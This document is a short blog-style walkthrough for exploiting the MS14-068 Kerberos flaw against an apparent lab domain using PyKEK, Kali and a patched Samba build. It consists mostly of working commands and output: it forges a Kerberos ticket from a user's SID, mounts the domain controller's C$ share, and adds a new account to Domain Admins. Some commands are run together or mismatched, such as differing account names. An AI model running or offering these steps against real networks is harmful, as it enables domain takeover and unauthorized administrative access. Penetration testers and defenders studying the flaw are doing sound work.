Exploiting MS14-068 with PyKEK and Kali

Here’s a quick writeup of exploiting MS14-068 using PyKEK and Kali.

Kali Prepwork

Install and Configure Kerberos

Install kerberos:

apt-get install krb5-user krb5-config

Create relevant kerberos config changes in /etc/krb5.conf:

  default_realm = pwn3d.local
  pwn3d.local = {
    kdc = dc1.pwn3d.local
    admin_server = dc1.pwn3d.local
    default_domain = pwn3d.local

Point DNS to the DNS Server/domain controller so SRV records (e.g. _kerberos._tcp.*) will resolve correctly in /etc/resolv.conf.

According to the TrustedSec blog, you’ll need to sync time with the domain controller. During my testing I didn’t perform any syncing and had no issues.

Download, Compile and Install Samba

The Kali Samba package is missing many of the Samba tools, including several that are very useful for exploiting MS14-068. The build steps below are based on mubix’s blog post Dumping NTDS.dit Domain Hashes Using Samba.

Download Samba 4.1.0 and the replication only patch.

wget http://ftp.samba.org/pub/samba/stable/samba-4.1.0.tar.gz

wget http://files.securusglobal.com/samba-4.1.0_replication-only-patch.txt

Extract the tarball.

tar zxvf samba-4.1.0.tar.gz mkdir src mv samba-4.1.0 src/

Add the replication only patch.

patch -p0 < samba-4.1.0_replication-only-patch.txt

Build and install Samba.

cd src/samba-4.1.0/
make -j 2 && make install


Determine the user SID:

rpcclient $> lookupnames john.smith
john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)

Supply the SID and relevant config options to the python script and the magic happens.

# python ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d
  [+] Building AS-REQ for Done!
  [+] Sending AS-REQ to Done!
  [+] Receiving AS-REP from Done!
  [+] Parsing AS-REP from Done!
  [+] Building TGS-REQ for Done!
  [+] Sending TGS-REQ to Done!
  [+] Receiving TGS-REP from Done!
  [+] Parsing TGS-REP from Done!
  [+] Creating ccache file 'TGT_john.smith@pwn3d.local.ccache'... Done!

Make the TGT your kerberos TGT.

# mv TGT_john.smith@pwn3d.local.ccache /tmp/krb5cc_$(echo $UID)


If all went well, you can now use kerberos to authenticate.

# smbclient -k -W pwn3d -U john.smith //dc1.pwn3d.local/C$
OS=[Windows Server 2008 R2 Standard 7601 Service Pack 1] Server=[Windows Server 2008 R2 Standard 6.1]
smb: \>

Create a new account and make it a member of the Domain Admins groups using the samba4 utilities/example code.

./user_add dc1.pwn3d.local kerberpwn3d2 Password1 -W pwn3d -U john.smith -k

./group_adduser dc1.pwn3d.local "Domain Admins" kerberpwn3d -W pwn3d -U john.smith -k


Tags: pykek, kali, samba, MS14-068